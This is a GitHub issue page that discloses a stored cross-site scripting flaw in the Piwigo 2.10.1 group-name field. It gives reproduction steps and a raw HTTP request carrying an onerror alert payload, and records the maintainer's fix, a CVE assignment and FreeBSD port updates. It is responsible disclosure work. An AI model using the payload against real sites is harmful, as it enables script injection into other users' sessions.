Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stored Cross-Site Scripting vulnerability in Piwigo CMS #1150

Closed
ankit-c opened this issue Jan 20, 2020 · 1 comment
Closed

Stored Cross-Site Scripting vulnerability in Piwigo CMS #1150

ankit-c opened this issue Jan 20, 2020 · 1 comment

Comments

@ankit-c
Copy link

ankit-c commented Jan 20, 2020

Description:

Piwigo version 2.10.1 is affected by stored cross site scripting vulnerability. This vulnerability exists in "Group Name" Field in "group_list" page.

How to reproduce:

  1. Login into the application.
  2. Go to the "Users" -> "Groups" page from life navigation menu.
  3. Click on "Add Group" button and then in "Group Name" field insert the payload and hit add button.

CVSS Score:
CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N


POST /piwig/admin.php?page=group_list HTTP/1.1
Host: 172.16.163.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://172.16.163.1
Connection: close
Cookie: pwg_display_thumbnail=no_display_thumbnail; phavsz=1141x490x1; pwg_id=i6juu2ls6m174g1f0abcjodjs7; user_auth=eyJpdiI6IkxnaGp4T0RGd1BiK2VDUzNWNHpRdlE9PSIsInZhbHVlIjoiU29tK1pzdDQzUDBKcWlRZk5VN04wVUNxR1JXUjdBd1Q5QUtOaUJRbUhyNGVjc0xETWUwWFd0RkpBV2ZJOFBKd3R4N2o2clNTRlhWaWtmc2ttQ2dMM3VrWU0rZ1B5cDJlZnpoUGFCZ2hmaHpJTURTVXJQdCtlbEpyeEp6RzhNUVAiLCJtYWMiOiI4YjY2NTU4N2JhOTc2MzkyZTcwOTQyNWQ3OThkNDZkZjMyODgxYjhjZGQ0NGQ2NTFhMjg3NWRmMzM2OGIwZDYzIn0%3D

groupname=%3Cimg+src%3DX+onerror%3Dalert%28document.domain%29%3E&submit_add=Add&pwg_token=46695f2721b77a2840903ba6298796be


Create_Group_title
Create_Group_title_2

@plegall plegall closed this as completed in 619849f Feb 7, 2020
plegall added a commit that referenced this issue Feb 7, 2020
It avoids any stored XSS between administrators and it's totally useless to have HTML code in the group name.
@plegall plegall added this to the 2.10.2 milestone Feb 7, 2020
@plegall plegall self-assigned this Feb 7, 2020
@ankit-c
Copy link
Author

ankit-c commented Feb 7, 2020

I got CVE-2020-8089 assigned for this vulnerability.

uqs pushed a commit to freebsd/freebsd-ports that referenced this issue May 23, 2020
Changelog:
- https://www.piwigo.org/release-2.10.2
- Piwigo/Piwigo#1150

PR:		245153
MFH:		2020Q2
Security:	436d7f93-9cf0-11ea-82b8-4c72b94353b5
Sponsored by:	Netzkommune GmbH


git-svn-id: svn+ssh://svn.freebsd.org/ports/head@536302 35697150-7ecd-e111-bb59-0022644237b5
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue May 23, 2020
Changelog:
- https://www.piwigo.org/release-2.10.2
- Piwigo/Piwigo#1150

PR:		245153
MFH:		2020Q2
Security:	436d7f93-9cf0-11ea-82b8-4c72b94353b5
Sponsored by:	Netzkommune GmbH
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue May 23, 2020
Update to 2.10.2

Changelog:
- https://www.piwigo.org/release-2.10.2
- Piwigo/Piwigo#1150

PR:		245153
Security:	436d7f93-9cf0-11ea-82b8-4c72b94353b5
Sponsored by:	Netzkommune GmbH

Approved by:	ports-secteam (with hat)
Jehops pushed a commit to Jehops/freebsd-ports-legacy that referenced this issue May 23, 2020
Changelog:
- https://www.piwigo.org/release-2.10.2
- Piwigo/Piwigo#1150

PR:		245153
MFH:		2020Q2
Security:	436d7f93-9cf0-11ea-82b8-4c72b94353b5
Sponsored by:	Netzkommune GmbH


git-svn-id: svn+ssh://svn.freebsd.org/ports/head@536302 35697150-7ecd-e111-bb59-0022644237b5
PatrickCronin pushed a commit to PatrickCronin/Piwigo that referenced this issue Jun 10, 2020
It avoids any stored XSS between administrators and it's totally useless to have HTML code in the group name.
PatrickCronin pushed a commit to PatrickCronin/Piwigo that referenced this issue Jun 10, 2020
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue Apr 1, 2021
Update to 2.10.2

Changelog:
- https://www.piwigo.org/release-2.10.2
- Piwigo/Piwigo#1150

PR:		245153
Security:	436d7f93-9cf0-11ea-82b8-4c72b94353b5
Sponsored by:	Netzkommune GmbH

Approved by:	ports-secteam (with hat)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants